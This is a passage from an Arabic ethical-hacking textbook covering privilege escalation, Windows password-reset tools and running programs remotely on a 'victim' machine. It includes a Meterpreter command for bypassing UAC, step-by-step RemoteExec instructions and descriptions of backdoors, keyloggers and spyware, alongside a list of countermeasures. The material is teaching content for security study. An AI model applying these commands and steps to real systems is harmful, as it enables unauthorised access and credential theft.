‫ﻣﻠﺣوظﮫ‪ :‬إذا ﻛﻧت ﺗﺣﺎول اﻟوﺻول إﻟﻰ ﺟﮭﺎز وﯾﻧدوز‪ 7‬او اﻹﺻدارات اﻷﻋﻠﻰ‪ ،‬ﯾﺟب ﺗﺷﻐﯾل اﻷﻣر ‪ bypassuac‬ﻗﺑل أن ﺗﺗﻣﻛن ﻣن ﺗﺷﻐﯾل‬
‫اﻷﻣر ‪ .getsystem‬ﺣﯾث ﯾﺳﻣﺢ ﻟك ﺑﺗﺟﺎوز ﺗﺣﻛم ﻣﺎﯾﻛروﺳوﻓت ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم )‪(UAC‬ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋﻧﮫ ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط‬
‫اﻟﺗﺎﻟﻲ‪http://windows.microsoft.com/en-us/windows7/products/features/user-account-control :‬‬
‫وﯾﺗم ﺗﺷﻐﯾل ھذا ﺑﺎﺳﺗﺧدام اﻷواﻣر ﻛﻣﺎ ﯾﻠﻲ ﻓﻲ ‪:Meterpreter‬‬
‫‪run post/windows/escalate/bypassuac‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


397

Other Privilege Escalation Tools

‫ وﻛﻠﻣﺎت ﻣرور‬Windows administrator ‫ أو اﻻﻟﺗﻔﺎف ﺣول‬،‫ إﻋﺎدة ﺗﻌﯾﯾن‬،‫أدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﺗﺳﻣﺢ ﻟك ﺑﺄﻣﺎن وﻛﻔﺎءة إزاﻟﺔ‬
‫ ﻣﻊ ﻣﺳﺎﻋدة‬.‫ وﻻ ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‬،‫ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ﻓﻲ ﺣﺎﻟﺔ ﻓﻘداﻧﮭﺎ أو ﻧﺳﯾﺎﻧﮫ ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‬
‫ ﯾﻣﻛﻧك اﻟﺣﺻول ﺑﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن طرﯾﻖ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻧﺳﯾﺔ أو اﻟﻐﯾر ﻣﻌروﻓﺔ إﻟﻰ ﻛﻠﻣﺎت‬،‫ﻣن ھذه اﻷدوات‬
‫ وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷدوات ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻋﻠﻰ اﻟﻧﺣو‬.‫ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧدام ھذه اﻷدوات ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر اﻷﺻﻠﯾﺔ ﻟﻠﺿﺣﯾﺔ‬.‫ﻓﺎرﻏﺔ‬
:‫اﻟﺗﺎﻟﻲ‬
Offline NT Password & Registry Editor available at http://pogostick.net
Windows Password Reset Kit available at http://www.reset-windows-password.net
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com
Elcomsoft System Recovery available at http://www.elcomsoft.com
Trinity Rescue Kit available at http://trinityhome.org
Windows Password Recovery Bootdisk available at http://www.rixler.com
PasswordLastic available at http://www.passwordlastic.com
Stellar Phoenix Password Recovery available at http://www.stellarinfo.com
Windows Password Recovery Personal available at http://www.windows-passwordrecovery.com
Windows Administrator Password Reset available at http://www.systoolsgroup.com

(How to Defend Against Privilege Escalation) ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬

‫أﻓﺿل اﻟطرق اﻟﻣﺿﺎدة ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ھو اﻟﺗﺄﻛد ﻣن أن اﻟﻣﺳﺗﺧدﻣﯾن ﻟدﯾﮭم اﻣﺗﯾﺎزات أﻗل درﺟﺔ ﻣﻣﻛﻧﺔ أو ﻣﺟرد اﻣﺗﯾﺎزات ﻛﺎﻓﯾﺔ‬
‫ أﻧﮫ ﻣن اﻟﻣﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن‬.‫ ﺑﻌض اﻟﻌﯾوب ﻓﻲ اﻛواد اﻟﺑرﻣﺟﺔ ﯾﺳﻣﺢ ﺑﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬،‫ ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن‬.‫ﻻﺳﺗﺧدام اﻟﻧظﺎم ﺑﺷﻛل ﻓﻌﺎل‬
.‫ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎز أﻋﻠﻰ ﻣن ﻣﺳؤول‬.‫اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام ﺣﺳﺎب ﻏﯾر إدارﯾﺔ‬
:‫ﺗﺷﻣل اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺿد ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز اﻟﻌﺎم اﻻﺗﻲ‬
.(Restrict the interactive logon privileges) ‫ ﺗﻘﯾﯾد اﻣﺗﯾﺎزات ﺗﺳﺟﯾل اﻟدﺧول‬-
.(Run users and applications on the least privileges) ‫ ﺟﻌل اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺷﻐﯾل اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻷﻗل اﻻﻣﺗﯾﺎزات‬-
. (Implement multi-factor authentication and authorization)‫ ﺗﻧﻔﯾذ ﻣﺻﺎدﻗﺔ ﻣﺗﻌددة اﻟﻌواﻣل‬-
.(Run services as unprivileged accounts) ‫ ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻛﺣﺳﺎﺑﺎت ﻣن ﻏﯾر اﻣﺗﯾﺎزات ﻣﺛل ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس‬-
(Use encryption technique to protect sensitive data) ‫ اﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﺷﻔﯾر ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ‬-
‫ ﺗﻧﻔﯾذ ﻣﻧﮭﺟﯾﺔ ﻓﺻل اﻣﺗﯾﺎز ﻟﻠﺣد ﻣن ﻧطﺎق أﺧطﺎء اﻟﺑرﻣﺟﺔ‬-
Implement a privilege separation methodology to limit the scope of programming errors and bugs
(Reduce the amount of code that runs with particular privilege)‫ ﺗﻘﻠﯾل ﻛﻣﯾﺔ اﻷﻛواد اﻟﺗﻲ ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻣﻊ اﻣﺗﯾﺎز ﺧﺎص‬-
(Perform debugging using bounds checkers and stress tests) ‫ إﺟراء ﺗﺻﺣﯾﺢ‬-
‫ اﺧﺗﺑﺎر ﻧظﺎم اﻟﺗﺷﻐﯾل واﺧطﺎء اﻛواد اﻟﺗطﺑﯾﻘﺎت واﻟﺧﻠل ﺑدﻗﺔ‬-
Test operating system and application coding errors and bugs thoroughly
(Patch the systems regularly) ‫ ﺗﺻﺣﯾﺢ اﻟﻧظم ﺑﺎﻧﺗظﺎم‬-

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪398‬‬

‫‪Executing Applications 5.5‬‬

‫ﻣن ﺧﻼل ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ ،‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف ﻟﺗﻧﻔﯾذ ﺑﻌض اﻷﻛواد ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‬
‫ﻣﻣﺎ ھو ﻣﺳﻣوح ﻟﮭم‪ .‬ﻋن طرﯾﻖ ﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ ،‬واﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد‬
‫اﻟﻧظﺎم‪ ،‬وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬واﻟﺗﻘﺎط اﻟﺻور‪ ،‬وﺗﺛﺑﯾت ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول‪ ،‬اﻟﺦ‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ ﺷرح ﻣﻔﺻل ﺣول ﺗﻧﻔﯾذ‬
‫اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪.‬‬

‫‪Executing Applications‬‬

‫ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ "اﻣﺗﻼك" اﻟﻧظﺎم‪ Executing Applications .‬ﯾﺗم ﺑﻌد‬
‫اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺻﻼﺣﯾﺎت إدارﯾﺔ)‪ . (administrative privileges‬اﻟﻣﮭﺎﺟم ﻗد ﯾﺣﺎول ﺗﻧﻔﯾذ ﺑﻌض ﻣن اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺧﺎﺻﺔ ﺑﮫ ﻋن‬
‫ﺑﻌد ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ ‪ Exploit‬أو ﻓﻘدان اﻟﺧﺻوﺻﯾﺔ‪ ،‬اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم‪،‬‬
‫وﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬واﻟﺗﻘﺎط ‪ ،screenshot‬ﺗﺛﺑﯾت ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭﻠﺔ اﻟوﺻول‪ ،‬وﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ‬
‫ﯾﻧﻔذ اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪:‬‬

‫‪Backdoors -‬‬
‫ھو ﻋﺑﺎره ﻋن ﺗطﺑﯾﻘﺎت ﻣﺻﻣﻣﺔ ل ‪ deny‬أو ﺗﻌطﯾل اﻟﻌﻣﻠﯾﺔ)‪ ، (disrupt operation‬ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗؤدي إﻟﻰ ‪ Exploit‬أو ﻓﻘدان‬
‫اﻟﺧﺻوﺻﯾﺔ‪ ،‬اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ ﻣوارد اﻟﻧظﺎم )ﺳﯾﺗم ﺗﻐطﯾﺗﮫ ﻻﺣﻘﺎ(‪.‬‬
‫‪Crackers -‬‬
‫ھو ﻋﺑﺎره ﻋن ﺟزء ﻣن ﺗطﺑﯾﻖ او ﺗطﺑﯾﻖ ﻣﺻﻣم ﻟﻛﺳر‪/‬ﻛراك اﻷﻛواد وﻛﻠﻣﺎت اﻟﻣرور‪.‬‬
‫‪Keyloggers -‬‬
‫ﯾﻣﻛن ھذا أن ﯾﻛون ﺟﮭﺎز )‪ (hardware‬أو ﺗطﺑﯾﻖ )‪ .(software‬ﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن ﻛﺎن اﻟﮭدف ھو ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪Spyware -‬‬
‫ﺑراﻣﺞ اﻟﺗﺟﺳس )‪ (Spy software‬ﯾﻣﻛﻧﮭﺎ اﻟﺗﻘﺎط ﺟزء ﻣن اﻟﺷﺎﺷﺔ )‪ (Capture screenshot‬وإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣوﻗﻊ ﻣﻌﯾن ﯾﺣدده اﻟﮭﺎﻛرز‪.‬‬
‫اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ھدف وھو اﻟﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﻐرض ﻣن ھذا‪ .‬ﺑﻌد اﺳﺗﺧﻼص ﻛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‬
‫ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺗﺛﺑﯾت اﻟﻌدﯾد ﻣن ‪ Backdoors‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﺳﮭوﻟﺔ اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‬
‫ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪.‬‬

‫‪Executing Applications: RemoteExec‬‬

‫اﻟﻣﺻدر‪http://www.isdecisions.com :‬‬

‫‪ RemoteExec‬ﯾﺳﻣﺢ ﻟك ﺑﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻋن ﺑﻌد وﺗﻧﻔﯾذ اﻟﺑراﻣﺞ‪/‬اﻻﺳﻛرﺑﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﺷﺑﻛﺔ‪ .‬ﺣﯾث ﯾﻣﻛﻧﮫ ﺗﺣدﯾث أي ﻣن اﻟﻣﻠﻔﺎت‬
‫واﻟﻣﺟﻠدات‪ ،‬وأﯾﺿﺎ ﻧﺳﺧﮭﺎ‪ ،‬وﻛذﻟك ﺣذﻓﮭﺎ ﻋﻠﻰ اﻟﻔور ﻋﻠﻰ أﻧظﻣﺔ اﻟوﯾﻧدوز‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذا ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﻐﯾﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺧﺎﺻﺔ‬
‫ﺑﺎﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ ﻋن ﺑﻌد‪ ،‬وﯾﻣﻛن ﺗﻌطﯾل ﻛﺎﻓﺔ اﻟﺣﺳﺎﺑﺎت اﻟﻣﺣﻠﯾﺔ اﻷﺧرى ﻟﺗﻌزﯾز اﻷﻣن‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﻋﺎدة‬
‫ﺗﺷﻐﯾل‪ ،‬إﯾﻘﺎف‪ ،wake up ،‬و‪ Power off‬ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد‪.‬‬

‫‪ -1‬ﻧﻘوم ﺑﺗﺛﺑﯾت اﻟﺗطﺑﯾﻖ ﻣن ﺧﻼل اﺗﺑﺎع ‪ Wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﮫ اﻟﺗﺛﺑﯾت‪.‬‬


‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪ RemoteExec‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪399‬‬

‫‪ -3‬ﻹﻋداد اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ )‪ (Executing file‬ﯾﺗم ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوق ‪Remote‬‬
‫‪ jobs‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -4‬ﻧﻘوم ﺑﺎﻟﻧﺛر اﻟﻣزدوج ﻓوق ‪ New remote job‬واﻟذي ﯾؤدى اﻟﻰ اﻋداد وﺗﺷﻐﯾل ‪ new remote job‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪400‬‬

‫‪ -5‬ﻓﻲ ﺟزء اﻻﻋداد ‪ New Remote job‬ﯾﻣﻛن رؤﯾﺔ اﻟﻌدﯾد ﻣن اﻟﻣﺟﻣوﻋﺎت واﻟﺗﻲ ﺗﻌﻣل ﻋن ﺑﻌد‪.‬‬
‫‪ -6‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﺳوف ﻧﺧﺗﺎر ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ ‪ File execution‬واﻟذي ﯾﻘوم ﺑﺗﺷﻐﯾل أي ﻣن اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ اﻟﺟﺎھز اﻟﮭدف‬
‫ﻋن ﺑﻌد وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ‪ File execution‬اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -7‬ﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺧﺎﺻﺔ ب ‪ File execution‬ﻋﻧد اﻟﺗﻌﺑﯾر ‪ File‬ﻧﺧﺗﺎر ﻣﻠف ‪ exe‬اﻟذي ﻧرﯾد ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ .‬ﻣن اﻟﻘﺎﺋﻣﺔ‬
‫اﻟﻣﻧﺳدﻟﺔ ﻣن اﻟﺗﻌﺑﯾر ‪ Context‬ﻧﺧﺗﺎر ‪ Interactive‬وأﯾﺿﺎ ﻧﺧﺗﺎر اﻟﺗﻌﺑﯾر ‪.auto‬‬
‫‪ -8‬ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب ‪ filter‬ﻧﺧﺗﺎر ﻋﻠﻰ ﺣﺳب اﻟﻧظﺎم اﻟﮭدف ﻣﺛﻼ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -9‬ﻓﻲ اﻟﺟزء اﻟﺧﺎص ب ‪ Target computers‬ﻧﺧﺗﺎر اﻟﮭدف اﻟذي ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻋﻠﯾﮫ وذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق‬
‫‪ Name‬وإدﺧﺎل اﻟﮭدف‪.‬‬

‫‪ -10‬اﻻن ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﺟﻣﯾﻊ اﻻﻋدادات ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪ Lunch‬اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪401‬‬

‫‪Executing Applications: DameWare NT Utilities‬‬

‫اﻟﻣﺻدر‪http://www.dameware.com :‬‬

‫اﻟﺑرﻧﺎﻣﺞ ‪ DameWare NT‬ﯾﺳﻣﺢ ﻟك ﻹدارة اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ‪ ،‬وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن‬
‫ھذا‪ ،‬ﯾﻣﻛﻧك إدارة أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد وإدارة اﻟوﯾﻧدوز‪ .‬أﯾﺿﺎ ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ ﺣل ﻣﺷﺎﻛل اﻟﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺎﺳﺗﺧدام ﺟﮭﺎز اﻟﺗﺣﻛم ﻋن‬
‫ﺑﻌد‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺷﻐﯾل اﻟﺧوادم وأﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺣﻣوﻟﺔ ﻋن ﺑﻌد‪ ،‬وأﺧذ ﻟﻘطﺎت )‪ (capture screenshot‬ﻣن ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪،‬‬
‫وﯾﻣﻛﻧﮫ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب ﻟﻠﻣﺳﺗﺧدم اﻟﻧﮭﺎﺋﻲ ﺑﺳرﻋﺔ‪ ،‬ﯾﻣﻛﻧﮫ ﻧﺳﺦ وﻛذﻟك ﺣذف اﻟﻣﻠﻔﺎت ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد‪ ،‬وإدارة‬
‫وﯾﻧدوز ‪ ،active directory‬اﻟﺦ‪.‬‬

‫‪Keyloggers‬‬

‫‪ ،Keyloggers‬وﯾﺳﻣﻰ أﯾﺿﺎ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ )‪ (keystroke logging‬وﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ راﺻد ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھو ﻋﺑﺎره ﻋن‬
‫ﺑرﻧﺎﻣﺞ ﻣﺧﻔﻲ ﯾرﺳل ﻋﺑر اﻹﯾﻣﯾل أو اﻧت ﺗﻘوم ﺑﺗﺣﻣﯾﻠﮫ ﻣن أﺣد اﻟﻣواﻗﻊ ﻏﯾر اﻟﻣوﺛوﻗﺔ أو ﯾﻛون ﺿﻣن اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ واﻧت ﻻ ﺗﻌﻠم ﺑذﻟك‪ ،‬وﻗد‬
‫ﯾﻛون ﻋﺑﺎره ﻋن اﺟﮭزه أﯾﺿﺎ ﺣﯾث ﯾﻘوم ﺑﻧﻘل ﻛﺎﻓﺔ ﻣﺎ ﯾﻛﺗب ﺑﻠوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ﺟﮭﺎت ﺑﻌﯾدة ﻋﺎدة إﻟﻰ ﺻﺎﺣب اﻟﺗﺟﺳس أو ﻣرﺳل اﻟﺑرﻧﺎﻣﺞ‪،‬‬
‫وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة‬
‫ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ‪ .‬ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ .‬أﻛﺛرﯾﺔ ﻣﺳﺗﺧدﻣﻲ ﺧدﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﯾوم‬
‫ﯾﻌرﻓون اﻟﺣد اﻷدﻧﻰ اﻟﻼزم ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟرﺳﺎﺋل اﻟﻛﺎذﺑﺔ اﻟﻣﺳﻣﺎة ‪Phishing‬و اﻟﺗﻲ ﺗﺻل ﺑﺎﺳم ﺷرﻛﺔ أو ﺑﻧك أو ﺷﺧص ﻣﻌﯾن ﻓﻲ‬
‫ﺣﯾن أﻧﮭﺎ ﻟﯾﺳت ﻣن اﻟﻣﺻدر اﻟﻣﻌﻠن ﻋﻧﮭﺎ وھدﻓﮭﺎ اﻟوﺣﯾد ھو ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺧﺎﺻﺔ ﺗﺳﺗﻌﻣﻠﮭﺎ ﻣﺛل ﻛﻠﻣﺎت ﻣرور ﺑﻧك أو أي ﻛﻠﻣﺎت ﻣرور‬
‫أﺧرى‪ .‬ھو ﻣﺛل اﻟﻣﺣول‪ ،‬ﺣﯾث ﻻ ﯾدرك اﻟﺷﺧص ان أﻧﺷطﺗﮫ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﯾﺗم رﺻدھﺎ‪ .‬ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺳﺗﺧدم ﻷﻏراض إﯾﺟﺎﺑﯾﺔ ﻣﺛل ﻓﻲ اﻟﻣﻛﺎﺗب‬
‫واﻟﻣواﻗﻊ اﻟﺻﻧﺎﻋﯾﺔ ﻟرﺻد أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣوظﻔﯾن وﻓﻲ ﺑﯾﺋﺎت اﻟﻣﻧزل ﺣﯾث ﯾﻣﻛن ﻟﻠواﻟدﯾن ﻣراﻗﺑﺔ ﻣﺎ ﺗﻘوم ﺑﮫ أطﻔﺎﻟﮭم ﻋﻠﻰ اﻹﻧﺗرﻧت‪.‬‬

‫‪ ، Keyloggers‬ﻋﻧدﻣﺎ ﯾرﺗﺑط ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس ‪ ،‬ﯾﺳﺎﻋد ﻋﻠﻰ ﻧﻘل اﻟﻣﻌﻠوﻣﺎت ﻟطرف ﺛﺎﻟث ﻏﯾر ﻣﻌروف‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﺑﺷﻛل ﻏﯾر ﻗﺎﻧوﻧﻲ‬
‫ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻷﻏراض ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ وﺳرﯾﺔ ﻣن اﻟﺿﺣﺎﯾﺎ‪ .‬ﯾﺗﺿﻣن ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪،‬‬
‫ﻛﻠﻣﺎت اﻟﺳر‪ ،‬اﻟﺗﻔﺎﺻﯾل اﻟﻣﺻرﻓﯾﺔ وﻧﺷﺎط ﻏرﻓﺔ اﻟدردﺷﺔ‪ ،IRC ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪ ،‬واﻟﺑﻧوك‪ ،‬وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن واﻷرﻗﺎم‪ ،‬وﻏﯾرھﺎ ﻣن‬
